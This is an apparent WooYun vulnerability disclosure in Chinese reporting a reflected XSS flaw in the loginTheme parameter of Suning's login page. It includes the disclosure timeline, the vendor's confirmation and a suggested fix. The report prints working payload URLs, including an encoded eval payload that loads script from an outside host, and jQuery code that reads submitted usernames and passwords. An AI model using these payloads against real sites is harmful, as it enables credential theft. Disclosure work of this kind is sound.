漏洞详情

披露状态:

2014-03-11: 细节已通知厂商并且等待厂商处理中
2014-03-12: 厂商已经确认,细节仅向厂商公开
2014-03-22: 细节向核心白帽子及相关领域专家公开
2014-04-01: 细节向普通白帽子公开
2014-04-11: 细节向实习白帽子公开
2014-04-25: 细节向公众公开

简要描述:

苏宁易购某分站反射型XSS漏洞可用于获取账号密码

详细说明:

苏宁易购登录页面存在反射型XSS漏洞,具体URL为:

https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c



虽然对loginTheme进行了一定的过滤,但是还是允许<a> <img>等html tag.

最简单的测试为:

https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Cimg%20src=%22test

可以看到会员登录框上出现一个image:

suning2.png



接下来就是如何构建注入代码加载JS文件,以及如何bypass浏览器的xss filter, 目前只是在FireFox上实现了加载JS,IE和chrome上还没有加载成功,相信各位大牛一定能找到方法。



加载的js的代码为:

$("form").submit(function( event ) {
alert($("input[name='username']").val() + '=' + $("input[name='password']").val());
});





FireFox上访问的URL构建为(javascript:eval + String.fromCharCode):

https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Ca%20href%3D%22javascript%3Aeval%28String.fromCharCode%2895,108,111,97,100,74,115,40,34,104,116,116,112,115,58,47,47,111,119,97,102,112,101,46,115,105,110,97,97,112,112,46,99,111,109,47,115,116,97,116,105,99,47,116,101,115,116,46,106,115,34,41%29%29;%22%20id=%22a



这里是注入<a>, 用户点击输入输入框时会加载js,提交的时候就能拿到username和password了。



如何利用就不用我讲了吧。

漏洞证明:

suning.png

修复方案:

过滤loginTheme参数

版权声明:转载请注明来源 龟兔赛跑@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-12 09:00

厂商回复:

感谢您对苏宁易购安全的关注,先确定,再安排修复,谢谢。

最新状态:

暂无


漏洞评价: